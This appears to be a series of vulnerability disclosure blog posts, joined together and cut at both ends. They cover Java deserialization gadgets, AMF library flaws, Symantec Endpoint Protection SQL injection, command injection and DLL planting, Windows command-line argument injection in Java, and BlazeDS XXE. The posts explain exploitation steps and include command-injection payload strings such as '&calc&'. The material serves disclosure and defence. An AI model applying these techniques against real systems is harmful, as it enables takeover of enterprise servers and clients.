SAP Application Server Java 7.30 with SAPJVM 1.6.0_23 (build 034)
SAP Application Server Java 7.40 with SAPJVM 1.6.0_43 (build 048)
After SAP Product Security's response, we downloaded SAPJVM 1.6.0_141 build 99 from [6] and indeed, the AnnotationInvocationHandler, which is at the core of the Jdk7u21 gadget, was patched. So, with that version, the Jdk7u21 gadget cannot be used anymore for exploitation.
However, since staying up-to-date with modern software product release cycles is a big challenge for customers, and the corresponding SAP notes do not explicitly bring the reader's attention to a severe security vulnerability, we'd like to raise awareness that not updating the SAP JVM can expose SAP systems to serious threats.
AMF is a binary serialization format primarily used by Flash applications. Code White has found that several Java AMF libraries contain vulnerabilities, which result in unauthenticated remote code execution. As AMF is widely used, these vulnerabilities may affect products of numerous vendors, including Adobe, Atlassian, HPE, SonicWall, and VMware.
Vulnerability disclosure has been coordinated with US CERT (see US CERT VU#307983).
Summary
Code White has analyzed the following popular Java AMF implementations:
Each of these has been found to be affected by one or more of the following vulnerabilities:
XML external entity resolution (XXE)
Creation of arbitrary objects and setting of properties
Java Deserialization via RMI
The first two vulnerabilities are not completely new, but we found that other implementations are also vulnerable. Finally, a way to turn a design flaw common to all implementations into a Java deserialization vulnerability has been discovered.
The Action Message Format version 3 (AMF3) is a binary message format mainly used by Flash applications for communicating with the back end. Like JSON, it supports different kinds of basic data types. For backwards compatibility, AMF3 is implemented as an extension of the original AMF (often referred to as AMF0), with AMF3 being a newly introduced AMF0 object type.
One of the new features of AMF3 objects is the addition of two new characteristics, so-called traits:
[…] ActionScript 3.0 introduces two further traits to describe how objects are serialized, namely 'dynamic' and 'externalizable'. The following table outlines the terms and their meanings:
[…]
Dynamic: an instance of a Class definition with the dynamic trait declared; public variable members can be added and removed from instances dynamically at runtime
Externalizable: an instance of a Class that implements flash.utils.IExternalizable and completely controls the serialization of its members (no property names are included in the trait information).
Let's elaborate on these new traits, especially on how these are implemented and the resulting implications.
The Dynamic Trait
The dynamic trait is comparable to JavaBeans functionality: it allows the creation of an object by specifying its class name and its properties by name and value. And actually, many implementations use existing JavaBeans utilities such as the java.beans.Introspector (e. g., Flamingo, Flex BlazeDS, WebORB) or they implement their own introspector with similar functionality (e. g., GraniteDS).
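To see why this is dangerous, consider a hedged sketch of what such an introspector-based mapper boils down to (all names here are illustrative; in a real AMF library the class name and property values come straight from the attacker-controlled message):

```java
import java.beans.Introspector;
import java.beans.PropertyDescriptor;
import java.lang.reflect.Method;

public class DynamicTraitDemo {

    // Stand-in for some class reachable on the server's classpath.
    public static class Victim {
        private String target;
        public void setTarget(String t) { this.target = t; }
        public String getTarget() { return target; }
    }

    // Instantiate a class by name and populate one property via its
    // public setter, JavaBeans-style.
    static Object instantiate(String className, String property, Object value)
            throws Exception {
        Object o = Class.forName(className).getDeclaredConstructor().newInstance();
        for (PropertyDescriptor pd :
                Introspector.getBeanInfo(o.getClass()).getPropertyDescriptors()) {
            Method setter = pd.getWriteMethod();
            if (pd.getName().equals(property) && setter != null) {
                setter.invoke(o, value); // arbitrary public setter invocation
            }
        }
        return o;
    }

    public static void main(String[] args) throws Exception {
        Victim v = (Victim) instantiate(
                "DynamicTraitDemo$Victim", "target", "attacker-value");
        System.out.println(v.getTarget());
    }
}
```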
The Externalizable Trait
The externalizable trait is comparable to Java's java.io.Externalizable interface. And in fact, all mentioned library vendors interpreted the flash.utils.IExternalizable interface from the specification as being equivalent to Java's java.io.Externalizable, effectively allowing the reconstruction of any class implementing the java.io.Externalizable interface.
A short excursion regarding the difference between java.io.Serializable and java.io.Externalizable: if you look at the java.io.Serializable interface, you'll see it is empty. So there are no formal contracts that can be enforced at build time by the compiler. But classes implementing the java.io.Serializable interface have the option to override the default serialization/deserialization by implementing various methods. That means there are a lot of additional checks during runtime to determine whether an actual object implements one of these opt-in methods, which makes the whole process bloated and slow.
Therefore, the java.io.Externalizable interface was introduced, which specifies two methods, readExternal(java.io.ObjectInput) and writeExternal(java.io.ObjectOutput), that give the class complete control over the serialization/deserialization. This means no default serialization/deserialization behavior, no additional checks during runtime, no magic. That makes serialization/deserialization using java.io.Externalizable much simpler and thus faster than using java.io.Serializable.
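A minimal example of the contract (illustrative class): the class itself writes and reads its members, nothing is serialized by default, and a public no-arg constructor is required for reconstruction.

```java
import java.io.*;

public class Point implements Externalizable {
    private int x, y;

    public Point() {}                       // required by Externalizable
    public Point(int x, int y) { this.x = x; this.y = y; }

    @Override
    public void writeExternal(ObjectOutput out) throws IOException {
        out.writeInt(x);                    // full control over the format
        out.writeInt(y);
    }

    @Override
    public void readExternal(ObjectInput in) throws IOException {
        x = in.readInt();                   // exact mirror of writeExternal
        y = in.readInt();
    }

    public static void main(String[] args) throws Exception {
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        ObjectOutputStream oos = new ObjectOutputStream(bos);
        oos.writeObject(new Point(3, 4));
        oos.flush();
        Point p = (Point) new ObjectInputStream(
                new ByteArrayInputStream(bos.toByteArray())).readObject();
        System.out.println(p.x + "," + p.y);
    }
}
```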
But now let's get back on track.
Turning Externalizable.readExternal into ObjectInputStream.readObject
In OpenJDK 8u121, there are 15 classes implementing java.io.Externalizable, and most of them only do boring stuff like reconstructing an object's state. Additionally, the actual java.io.ObjectInput instances passed to the Externalizable.readExternal(java.io.ObjectInput) implementations are not instances of java.io.ObjectInputStream. So no quick win here.
Of these 15 classes, those related to RMI stood out. That word alone should make you sit up. Especially sun.rmi.server.UnicastRef and sun.rmi.server.UnicastRef2 seemed interesting, as they reconstruct a sun.rmi.transport.LiveRef object via its sun.rmi.transport.LiveRef.read(ObjectInput, boolean) method. This method then reconstructs a sun.rmi.transport.tcp.TCPEndpoint and a local sun.rmi.transport.LiveRef and registers it at the sun.rmi.transport.DGCClient, the RMI distributed garbage collector client:
DGCClient implements the client-side of the RMI distributed garbage collection system.
The external interface to DGCClient is the "registerRefs" method. When a LiveRef to a remote object enters the VM, it needs to be registered with the DGCClient to participate in distributed garbage collection.
When the first LiveRef to a particular remote object is registered, a "dirty" call is made to the server-side distributed garbage collector for the remote object […]
So according to the documentation, registering our LiveRef results in a call for a remote object to the endpoint specified in our LiveRef? Sounds like RCE via RMI!
Tracing the call hierarchy of ObjectInputStream.readObject actually reveals that there is a path from an Externalizable.readExternal call via sun.rmi.server.UnicastRef/sun.rmi.server.UnicastRef2 to ObjectInputStream.readObject in sun.rmi.transport.StreamRemoteCall.executeCall().
So let's see what happens if we deserialize an AMF message with a sun.rmi.server.UnicastRef object using the following code utilizing Flex BlazeDS:
As a first proof of concept, we just start a listener with netcat and see if the connection gets established.
This technique has already been shown as a deserialization blacklist bypass by Jacob Baines in 2016, but I'm not sure if he was aware that it also turns any Externalizable.readExternal into an ObjectInputStream.readObject. He also presented a JRMP listener that sends a specified payload. Later, the JRMP listener has been added to ysoserial, which can deliver any available payload:
Applications using Adobe's/Apache's implementation should migrate to Apache's latest release version 4.7.3, which addresses this issue.
Exadel has discontinued its library, so there won't be any updates.
For GraniteDS and WebORB for Java, there is currently no response/solution.
Coincidentally, there is the JDK Enhancement Proposal JEP 290: Filter Incoming Serialization Data addressing the issue of Java deserialization vulnerabilities in general, which has already been implemented in the most recent JDK versions 6u141, 7u131, and 8u121.
[Update 08/05/2015: Added reference to CVE-2012-3213 of James Forshaw. Thanks for the heads up]
As already mentioned in our Infiltrate '16 and RuhrSec '16 talks, Code White spent some research time to look for serialization gadgets. Apart from the Javassist/Weld gadget we also found an old but interesting gadget, only using classes from the Java Runtime Environment (so called JRE gadget).
We called the gadget Return of the Rhino since the relevant gadget classes are part of the Javascript engine Rhino, bundled with Oracle JRE6 and JRE7.
As you may already know, the Rhino Script engine has already been abused in JVM sandbox escapes in the past (e.g. CVE-2011-3544 of Michael Schierl and CVE-2012-3213 of James Forshaw).
We stumbled over the gadget just by accident when we realized that there is a huge difference between the official Oracle JRE and the JREs bundled with common Linux distros.
Most may not know that the Rhino Script Engine is actively developed by the Mozilla Project and distributed as a standalone package/jar (packages under org.mozilla.*). Furthermore, Oracle JRE6/7 bundles an old fork of Rhino (packages under sun.org.mozilla.*). Surprisingly, Oracle applied some hardening to Rhino core classes with JRE7u15, so that they are not serializable anymore. The changes were made to fix a sandbox escape (CVE-2012-3213) of James Forshaw (see James' blog post).
But those hardening changes were not incorporated into Mozilla's Rhino mainline, which happens once in a while. So the gadget still works if you are using OpenJdk bundled with Ubuntu or Debian.
Let's take a look at the static view of some Rhino core classes:
In the Rhino Javascript domain, almost every Javascript language object is represented as a ScriptableObject in the Java domain.
Functions, Types, Regexes and several other Javascript objects are implemented in Java classes, extending ScriptableObject.
A ScriptableObject has two interesting members: a reference to its prototype object and an array of Slot objects. The slots store the properties of a Javascript object. A slot can either be a Slot, a GetterSlot, or a RelinkedSlot. For our gadget we only focus on the GetterSlot inner class.
Every Slot class has a getValue() method used to retrieve the value of the property. In case of a GetterSlot the value is taken from a call to either a MemberBox or Function instance. And both MemberBox and Function instances do dynamic method calls using Java's Reflection API. That's already the essence of the story :-). But let's go into details.
The class NativeError is a successor of IdScriptableObject which inherits from ScriptableObject. ScriptableObject implements the tagging interface Serializable, hence all successors like NativeError are serializable. The class NativeError has an interesting way of how toString() is performed:
In the very beginning, toString() just calls js_toString(this).
And now we reach the point where it gets interesting. In the first line of js_toString(), a property called "name" is retrieved from the NativeError instance using the static method ScriptableObject.getProperty().
In ScriptableObject.getProperty() the property value is retrieved by calling the IdScriptableObject.get() method which delegates the property resolution call to its ancestor ScriptableObject.
ScriptableObject gets the value of the property from the Slot instance of the Slot[] by calling the getValue() method.
In case of a ScriptableObject$GetterSlot (inner class of ScriptableObject) we finally reach the code where reflection calls are eventually happening.
As already shown in the static class view, ScriptableObject$GetterSlot has a member "getter" of class Object. In the getValue() method of ScriptableObject$GetterSlot two cases are checked.
In case of getter being an instance of MemberBox, the invoke method on the MemberBox instance is called which just wraps a dynamic call using Java's Reflection API.
The Method object used in the reflection call comes from the member variable "memberObject" of class MemberBox. Although "memberObject" is of type java.lang.reflect.Member, only java.lang.reflect.Method or java.lang.reflect.Constructor instances are valid classes for "memberObject". Both java.lang.reflect.Method and java.lang.reflect.Constructor are not serializable, so obviously the value of "memberObject" needs to be set in the readObject() method of MemberBox during deserialization.
Specifically, "memberObject" is set in method readMember(), creating a java.lang.reflect.Method object using values coming from the serialized object stream.
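In essence, readMember() performs the equivalent of the following lookup, where the class name, method name, and parameter types all come from the attacker-controlled stream (a simplified sketch of the idea, not the actual Rhino code):

```java
import java.lang.reflect.Method;

class ReadMemberSketch {
    // Rebuild a non-serializable java.lang.reflect.Method from serializable
    // data, the way MemberBox.readMember() does: declaring class name,
    // method name, and parameter types are read from the stream.
    static Method rebuildMethod(String className, String methodName,
                                Class<?>... parameterTypes) throws Exception {
        Class<?> declaring = Class.forName(className);
        return declaring.getMethod(methodName, parameterTypes);
    }
}
```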
So we can control the java.lang.reflect.Method object used in the reflection call. How about the instance ("getterThis") on which method gets invoked? Is this instance also created from the serialized object stream and hence under our control? If we look back into the implementation of method ScriptableObject$GetterSlot.getValue(), we see that the value of "getterThis" depends on the value of member "delegateTo" of the MemberBox instance. "delegateTo" is marked transient and is not set in readObject() during deserialization. So the first case of the if-statement applies and "getterThis" is assigned to "start" which is our NativeError instance. And the arguments of the reflection call are just set to an empty Object[]. Bad for us, but there's hope as we will see later.
Looking again at ScriptableObject$GetterSlot.getValue() we see a second case, if "getter" is an instance of Function. The interface Function sounds very interesting.
And we have plenty of classes implementing Function, most of them being serializable.
From all those classes the serializable NativeJavaMethod class nearly jumped into our face. Before we go into details, let's take another look at the static view of some Rhino core classes, taking the NativeJavaMethod into account.
And a quick look into the call() method revealed the following: In the beginning, the "index" variable is returned from the call to method findCachedFunction(). This method eventually calls findFunction(), which calculates one MemberBox instance from the member "methods" (of type MemberBox[]) using a more or less complex algorithm. If the methods array has only one element, findCachedFunction() will just return 0 as the index value.
The variable "meth" is assigned to methods[0]. Just keep in mind that the member "methods" is under our control as it comes from the serialized object stream. At the very end of the figure we have a dynamic method invocation, as the method invoke() is called on the MemberBox instance "meth". So we can control the Method object/method to be invoked, which is half the battle.
How about the target instance "javaObject"? Can we control it?
We might be able to control it if "o" is an instance of Wrapper. Then, the unwrap() method on "o" is called and the return value assigned to "javaObject". "o" is assigned to "thisObject" which is our NativeError instance. NativeError is not of type Wrapper, but we can see a "for" loop which reassigns "o" to the prototype object of "o" using the getPrototype() method.
So if we can set the prototypeObject member of our NativeError instance to a Wrapper instance and get the unwrap() method to return an object under our control, we are ready to go!
And the serializable class NativeJavaObject does what is needed here. It just returns the value of the member "javaObject" in its unwrap() method.
Another update to the static view of some Rhino core classes, taking NativeJavaObject into account.
So apparently the only thing we need to do is to create a NativeError instance, set its prototype to a NativeJavaObject which wraps our target instance, create a NativeJavaMethod and specify the method to be invoked on the target instance, serialize it, and deserialize it again. But now we get the following exception:
Looks like we need a Context being associated with the current thread :-(
But hey! There is a static method Context.enter() which sets the Context we really need. We just need to trigger it in advance. But how do we call Context.enter() if we can use neither a MemberBox nor a NativeJavaMethod directly? To get around this, we use a trick we had known for a while:
When you do a reflection call, the target object is ignored, if the method to be invoked is a static method. That's it.
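This behavior is easy to verify: for a static method, invoke() simply disregards whatever receiver object is passed (shown here with Integer.parseInt; any static method behaves the same):

```java
import java.lang.reflect.Method;

class StaticInvokeSketch {
    // For static methods, the receiver argument of invoke() is ignored
    // entirely -- it may be any unrelated object, or even null.
    static Object invokeStaticIgnoringTarget(Object ignoredTarget)
            throws Exception {
        Method parseInt = Integer.class.getMethod("parseInt", String.class);
        return parseInt.invoke(ignoredTarget, "123");
    }
}
```

This is exactly why a MemberBox reflection call whose first argument is forced to be our NativeError instance is still useful: with Context.enter() as the target method, the bogus receiver simply does not matter.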
And if you look back, we already had found a call to invoke() on a MemberBox instance being triggered from method ScriptableObject$GetterSlot.getValue(). But the first argument was always our NativeError instance. As already mentioned, the first argument gets ignored if you use a static method such as Context.enter() as your target method :-).
So if we would have two property accesses on NativeError, we could then trigger a reflection call on Context.enter() using a MemberBox and then another reflection call using a NativeJavaMethod.
Luckily, we have two property accesses in method js_toString() of class NativeError:
The only remaining problem is how to trigger a toString() call on a NativeError object during deserialization. As you may have already seen in our Infiltrate '16 or RuhrSec '16 slidedecks you can use the "trampoline" class javax.management.BadAttributeValueExpException for that.
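The trampoline works because BadAttributeValueExpException.readObject() ends up calling toString() on the deserialized private val field. The following minimal stand-in class illustrates the pattern (it is not the real JDK class, which requires reflective field access to set val):

```java
import java.io.*;

// Stand-in for the BadAttributeValueExpException "trampoline": during
// deserialization, readObject() invokes toString() on a stored object.
class TrampolineSketch implements Serializable {
    Object val;
    static String lastToString;  // records that toString() actually ran

    private void readObject(ObjectInputStream in)
            throws IOException, ClassNotFoundException {
        in.defaultReadObject();
        lastToString = val.toString();  // side effect at deserialization time
    }

    static Object roundTrip(Object obj)
            throws IOException, ClassNotFoundException {
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        new ObjectOutputStream(bos).writeObject(obj);
        return new ObjectInputStream(
                new ByteArrayInputStream(bos.toByteArray())).readObject();
    }
}
```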
Getting code execution is trivial now. You can use Adam Gowdiak's technique and create a serializable com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl instance and invoke the newTransformer() method on it by using the reflection primitive of NativeJavaMethod. Or you just invoke the execute() method on a serializable com.sun.rowset.JdbcRowSetImpl instance and load a RMI class from your server (for further details see our Infiltrate '16 or RuhrSec '16 slidedecks).
The outcome of Code White's research efforts into Java deserialization vulnerabilities was presented at Infiltrate 2016 by Matthias Kaiser.
The talk gave an introduction into finding and exploiting Java deserialization vulnerabilities. Technical details about the Oracle Weblogic deserialization RCE (CVE-2015-4852) and a SAP Netweaver AS Java 0day were shown.
The slidedeck doesn't include the SAP Netweaver AS Java 0day POC and it won't be published until fixed.
Unfortunately, in older versions of SEP, namely the versions 11.x, some of the flawed features of 12.x weren’t even implemented, e. g., the password reset feature. However, SEP 11.x has other vulnerabilities that can have the same impact.
Vulnerabilities in Symantec Endpoint Protection 11.x
The following vulnerabilities have been discovered in Symantec Endpoint Protection 11.x:
SEP Manager
SQL Injection
Allows the execution of arbitrary SQL on the SQL Server by unauthenticated users.
Command Injection
Allows the execution of arbitrary commands with 'NT Authority\SYSTEM' privileges by users with write access to the database, e. g., via the before-mentioned SQL injection.
SEP Client
Binary Planting
Allows the execution of arbitrary code with 'NT Authority\SYSTEM' privileges on SEP clients running Windows by local users.
The AgentRegister operation of the AgentServlet is vulnerable to SQL injections within the HardwareKey attribute:
To reach that point, we need to provide a valid DomainID, which can be retrieved from a SEP client installation from the SyLink.xml file located in C:\ProgramData\Symantec\Symantec Endpoint Protection\CurrentVersion\Data\Config.
Exploiting this vulnerability is a little more complicated. For example, changing a SEPM administrator user’s password requires the manipulation of a configuration stored as an XML document in the database.
The administrative users are stored in the SemConfigRoot document in the basic_metadata table with the hard-coded ID B655E64D0A320801000000E164041B79. An administrator entry might look like this:
The complicated part is that this configuration document is crucial for the whole SEPM: any change resulting in an invalid XML document causes a denial of service. That’s why it’s important that every manipulation leaves the document valid.
So how can we modify that document to our advantage?
The stored PasswordHash is simply the MD5 of the password in hexadecimal representation. So replacing that attribute value with a new one would allow us to login with that password.
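For example, computing the PasswordHash for a chosen password is a one-liner around MessageDigest (plain MD5 over the password bytes, as described above):

```java
import java.security.MessageDigest;

class Md5Sketch {
    // SEPM's PasswordHash is just the hex-encoded MD5 of the password.
    static String md5Hex(String password) throws Exception {
        MessageDigest md = MessageDigest.getInstance("MD5");
        StringBuilder sb = new StringBuilder();
        for (byte b : md.digest(password.getBytes("UTF-8"))) {
            sb.append(String.format("%02x", b));
        }
        return sb.toString();
    }
}
```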
But we neither know the current PasswordHash value (obviously!) nor any other attribute value that we can use as an anchor point for the string manipulation.
However, we know other parts of the SemAdministrator element that we can use. For example, if we replace ' PasswordHash=' by ' PasswordHash="[…]" OldPasswordHash=', we can set our own PasswordHash value while being able to reverse the operation by replacing ' PasswordHash="[…]" OldPasswordHash=' by ' PasswordHash=':
Here we first do the reverse operation in line 14 before updating the PasswordHash value with ours in line 15 to avoid accidentally creating an invalid document in the case the update is executed multiple times.
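Expressed in Java rather than T-SQL, the manipulation boils down to the following idempotent pair of string replacements (our model for illustration, with hypothetical attribute values):

```java
class PasswordSwapSketch {
    // Inject our hash while preserving the original one under a renamed
    // attribute; running it twice yields the same result (idempotent),
    // so the XML document never ends up in an invalid state.
    static String inject(String xml, String newHash) {
        return reset(xml, newHash).replace(" PasswordHash=",
                " PasswordHash=\"" + newHash + "\" OldPasswordHash=");
    }

    // Reverse operation: restore the original PasswordHash attribute.
    static String reset(String xml, String newHash) {
        return xml.replace(
                " PasswordHash=\"" + newHash + "\" OldPasswordHash=",
                " PasswordHash=");
    }
}
```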
There may also be other attributes that need to be modified, like the Name, or the AuthenticationMethod to switch to local authentication instead of RSA SecurID or Directory authentication.
The reset would be just doing the reverse operation on the XML document:
Now we can log into the SEPM and could exploit CVE-2015-1490 to upload arbitrary files to the SEPM server, resulting in the execution of arbitrary code with 'NT Authority\SYSTEM' privileges.
If changing the admin password does not work for some reasons, you can also use the SQL injection to exploit the command injection described next.
Command Injection
From the previous blog post on Java and Command Line Injections in Windows we know that injecting additional arguments and even commands may be possible in Java applications on Windows, even when ProcessBuilder is utilized.
SEPM creates processes in only a few locations, and even fewer seem promising and can actually be triggered. The SecurityAlertNotifyTask class is one of them: it processes security alerts from the database, which we can modify via the SQL injection.
The notification tasks are stored in the notification table. For manipulating the command line, we need to reach the doRunExecutable(String) method. This happens if the notification.email contains batchfile. The executable to call is taken from notification.batch_file_name. However, only existing files from the C:\Program Files (x86)\Symantec\Symantec Endpoint Protection Manager\bin directory can be specified.
The next problem is to find a way to manipulate arguments used in the building of the command line. The only additional argument passed is the parameter of the doRunExecutable method. Unfortunately, the values passed are notification messages originating from a properties file and most of them are parameterized with integers only.
However, the notification message for a new virus is parameterized with the name of the new virus, which originates from the database as well. So if we register a new virus with our command line injection payload as the virus name and register a new security alert notification, the given batch file would be called with the predefined notification message containing the command line injection. And since .bat files are silently started in a cmd.exe shell environment, it should be easy to get a calc.
The following SQL statements set up the mentioned security alert notification scenario:
"C:\Program Files (x86)\Symantec\Symantec Endpoint Protection Manager\bin\dbtools.bat" "New risk found: "&calc&"."
And there we have a calc.
SEP Client
Binary Planting
The Symantec AntiVirus service process Rtvscan.exe of the SEP client is vulnerable to Binary Planting, which can be exploited for local privilege escalation. During the collection of version information of installed engines and definitions, the process is looking for a SyKnAppS.dll in C:\ProgramData\Symantec\SyKnAppS\Updates and loading it if present. This directory is writable by members of the built-in Users group:
The version information collection can be triggered in the SEP client GUI via Help and Support, Troubleshooting..., then Versions. To exploit it, we place our DLL into the C:\ProgramData\Symantec\SyKnAppS\Updates directory. But before that, we need to place the original SyKnAppS.dll from the parent directory in there and trigger the version information collection once, as SEP does some verification of the DLL before loading it, but only once and not on every load:
Everyone knows that incorporating user provided fragments into a command line is dangerous and may lead to command injection. That’s why in Java many suggest using ProcessBuilder instead where the program’s arguments are supposed to be passed discretely in separate strings.
However, in Windows, processes are created with a single command line string. And since there are different and seemingly confusing parsing rules for different runtime environments, proper quoting seems to be likewise complicated.
This makes Java for Windows still vulnerable to injection of additional arguments and even commands into the command line.
Windows’ CreateProcess Command Lines
In Windows, the main function for creating processes is the CreateProcess function. In contrast to C API functions like execve, arguments are not passed separately as an array of strings but in a single command line. Correspondingly, on the receiving side, the entry point function WinMain expects a single command line string as well.
This already produces different and frankly surprising results in some cases:
The last two are remarkable as one additional quotation mark swaps the results of argv and CommandLineToArgvW.
Java’s Command Line Generation in Windows
With the knowledge of how CreateProcess expects the command line arguments to be quoted, let’s see how Java builds the command line and quotes the arguments for Windows.
If a process is started using ProcessBuilder, the arguments are passed to the static method start of ProcessImpl, which is a platform-dependent class. In the Windows implementation of ProcessImpl, the start method calls the private constructor of ProcessImpl, which creates the command line for the CreateProcess call.
In the private constructor of ProcessImpl, there are two operational modes: the legacy mode and the strict mode. These are the result of issues caused by changes to Runtime.exec. The legacy mode is only performed if there is no SecurityManager present and the property jdk.lang.Process.allowAmbiguousCommands is not set to false.
The Legacy Mode
In the legacy mode, the first argument (i. e., the program to execute) is quoted if required and then the command line is created using createCommandLine.
The needsEscaping method checks whether the value is already quoted using isQuoted, or whether it needs to be wrapped in double quotes because it contains certain characters.
The verification type VERIFICATION_LEGACY passed to needsEscaping causes noQuotesInside in isQuoted to be false, which would allow quotation marks within the path. It also makes needsEscaping test for space and tabulator characters only.
But let’s take a look at the createCommandLine method, which creates the command line:
Again, with the verification type VERIFICATION_LEGACY, the needsEscaping method returns false if the value is already wrapped in quotes (regardless of any quotes within the string) and returns true only if it is not wrapped in quotes and contains a space or tabulator character (again, regardless of any quotes within the string). If a value needs quoting, it is simply wrapped in quotes and a possible trailing backslash is doubled.
Ok, so far, so good. Now let’s recall Daniel Colascione’s conclusion:
Do not:
Simply add quotes around command line arguments without any further processing.
[…]
Yes, exactly. This can be exploited to inject additional arguments:
A value that is considered to be quoted:
passed argument value: "arg 1" "arg 2" "arg 3"
quoted argument value: no quoting needed as it’s “already quoted”
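The flawed legacy-mode logic can be modeled in a few lines (our reconstruction for illustration, not the actual ProcessImpl source):

```java
class LegacyQuotingSketch {
    // VERIFICATION_LEGACY: a value wrapped in quotes counts as "already
    // quoted" -- there is no check for quotes *inside* the string.
    static boolean isQuoted(String arg) {
        return arg.length() >= 2
                && arg.startsWith("\"") && arg.endsWith("\"");
    }

    // Quote only if needed; an "already quoted" value passes unchanged.
    static String maybeQuote(String arg) {
        if (isQuoted(arg)) return arg;
        if (arg.indexOf(' ') >= 0 || arg.indexOf('\t') >= 0)
            return "\"" + arg + "\"";
        return arg;
    }
}
```

A single argument string like '"arg 1" "arg 2" "arg 3"' therefore reaches the command line untouched and is split into three separate arguments by the child process.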
In the strict mode, things are a little different.
If the path contains a quote, getExecutablePath throws an exception and the catch block is executed where getTokensFromCommand tries to extract the path.
However, the rather interesting part is that createCommandLine is called with a different verification type based on whether isShellFile denotes it as a shell file.
But I’ll come back to that later.
With the verification type VERIFICATION_WIN32, noQuotesInside is still false and both injection examples mentioned above work as well.
However, if needsEscaping is called with the verification type VERIFICATION_CMD_BAT, noQuotesInside becomes true. And without being able to inject a quote we can’t escape the quoted argument.
CreateProcess’ Silent cmd.exe Promotion
Remember the isShellFile checked the file name extension for .cmd and .bat? This is due to the fact that CreateProcess executes these files in a cmd.exe shell environment:
[…] the decision tree that CreateProcess goes through to run an image is as follows:
[…]
If the file to run has a .bat or .cmd extension, the image to be run becomes Cmd.exe, the Windows command prompt, and CreateProcess restarts at Stage 1. (The name of the batch file is passed as the first parameter to Cmd.exe.)
That means a 'file.bat …' becomes 'C:\Windows\system32\cmd.exe /c "file.bat …"' and an additional set of quoting rules would need to be applied to avoid command injection in the command line interpreted by cmd.exe.
However, since Java does no additional quoting for this implicit cmd.exe call promotion on the passed arguments, injection is even easier: &calc& does not require any quoting and will be interpreted as a separate command by cmd.exe.
This works in the legacy mode just like in the strict mode if we make isShellFile return false, e. g., by adding whitespace to the end of the path, which tricks the endsWith check but is ignored by CreateProcess.
Conclusion
Command line parsing in Windows is not consistent, and consequently the implementation of proper quoting of command line arguments is even less so. This may allow the injection of additional arguments.
Additionally, since CreateProcess implicitly starts .bat and .cmd in a cmd.exe shell environment, even command injection may be possible.
As an example, Java for Windows fails to properly quote command line arguments, even with ProcessBuilder, where arguments are passed as a list of strings:
Argument injection is possible by providing an argument containing further quoted arguments, e. g., '"arg 1" "arg 2" "arg 3"'.
On cmd.exe process command lines, a simple '&calc&' alone suffices.
Only in the strictest mode, the VERIFICATION_CMD_BAT verification type, is injection not possible:
Legacy mode:
VERIFICATION_LEGACY: There is no SecurityManager present and jdk.lang.Process.allowAmbiguousCommands is not explicitly set to false (no default set)
allows argument injection
allows command injection in cmd.exe calls (explicit or implicit)
Strict mode:
VERIFICATION_CMD_BAT: Strictest mode, file ends with .bat or .cmd
does not allow argument injection
does not allow command injection in cmd.exe calls
VERIFICATION_WIN32: File does not end with .bat or .cmd
allows argument injection
allows command injection in cmd.exe calls (explicit or implicit)
However, Java’s check for switching to the VERIFICATION_CMD_BAT mode can be circumvented by adding whitespace after the .bat or .cmd extension.
In a recent Product Security Review, Code White researchers discovered an XXE vulnerability in Adobe's/Apache's Flex BlazeDS (see ASF Advisory).
The vulnerable code can be found in the BlazeDS Remoting/AMF protocol implementation.
All versions before 4.7.1 are vulnerable.
Software products providing BlazeDS Remoting destinations might be also affected by the vulnerability (e.g. Adobe LiveCycle Data Services, see APSB15-20).
Vulnerability Details
An AMF message has a header and a body. To parse the body, the method readBody() of AmfMessageDeserializer is called.
In this method, the targetURI, responseURI and the length of the body are read. Afterwards, the method readObject() is called, which eventually calls the method readObject() of an ActionMessageInput instance (either Amf0Input or Amf3Input).
In case of an Amf0Input instance, the type of the object is read from the next byte. If the type has the value 15, the following bytes of the body are parsed as a UTF string in the method readXml().
The xml string gets passed to method stringToDocument of class XMLUtil where the Document is created using the DocumentBuilder.
When a DocumentBuilder is created through the DocumentBuilderFactory, external entities are allowed by default.
The developer needs to configure the parser to prevent XXE.
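The usual remediation is to disable DTDs and external entities explicitly. A hardened configuration might look like this (standard JAXP hardening; this is not the actual BlazeDS patch):

```java
import javax.xml.parsers.DocumentBuilderFactory;

class XxeHardeningSketch {
    // DocumentBuilderFactory resolves external entities by default;
    // these features must be set explicitly to prevent XXE.
    static DocumentBuilderFactory hardenedFactory() throws Exception {
        DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
        // forbid DOCTYPE declarations altogether (strongest protection)
        dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
        dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        dbf.setXIncludeAware(false);
        dbf.setExpandEntityReferences(false);
        return dbf;
    }
}
```

With disallow-doctype-decl enabled, any document containing a DOCTYPE is rejected with a SAXParseException before entity resolution can happen.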
Exploitation
Exploitation is easy, just send the XXE vector of your choice.
In a recent research project, Markus Wulftange of Code White discovered several critical vulnerabilities in the Symantec Endpoint Protection (SEP) suite 12.1, affecting versions prior to 12.1 RU6 MP1 (see SYM15-007).
As with any centralized enterprise management solution, compromising a management server is quite attractive for an attacker, as it generally allows some kind of control over its managed clients. Taking control of the manager can yield a takeover of the whole enterprise network.
In this post, we will take a closer look at some of the discovered vulnerabilities in detail and demonstrate their exploitation. In combination, they effectively allow an unauthenticated attacker the execution of arbitrary commands with 'NT Authority\SYSTEM' privileges on both the SEP Manager (SEPM) server, as well as on SEP clients running Windows. That can result in the full compromise of a whole corporate network.
Vulnerabilities in Symantec Endpoint Protection 12.1
Code White discovered the following vulnerabilities in Symantec Endpoint Protection 12.1:
Allows the execution of arbitrary code with 'NT Authority\SYSTEM' privileges on SEP clients running Windows
The objective of our research was to find a direct way to take over a whole Windows domain and thus aimed at a full compromise of the SEPM server and the SEP clients running on Windows. Executing post exploitation techniques, like lateral movement, would be the next step if the domain controller hasn't already been compromised by this.
Therefore, we focused on SEPM's Remote Java or Web Console, which is probably the most exposed interface (accessible via TCP ports 8443 and 9090) and offers most of the functionalities of SEPM's remote interfaces. There are further entry points, which may also be vulnerable and exploitable to gain access to SEPM, its server, or the SEP clients. For example, SEP clients for Mac and Linux may also be vulnerable to Binary Planting.
Attack Vector and Exploitation
A full compromise of the SEPM server and SEP clients running Windows was possible through the following steps:
Gaining administrative access to the SEP Manager (CVE-2015-1486)
Full compromise of SEP Manager server (CVE-2015-1487 and CVE-2015-1489)
Full compromise of SEP clients running Windows (CVE-2015-1492)
CVE-2015-1486: SEPM Authentication Bypass
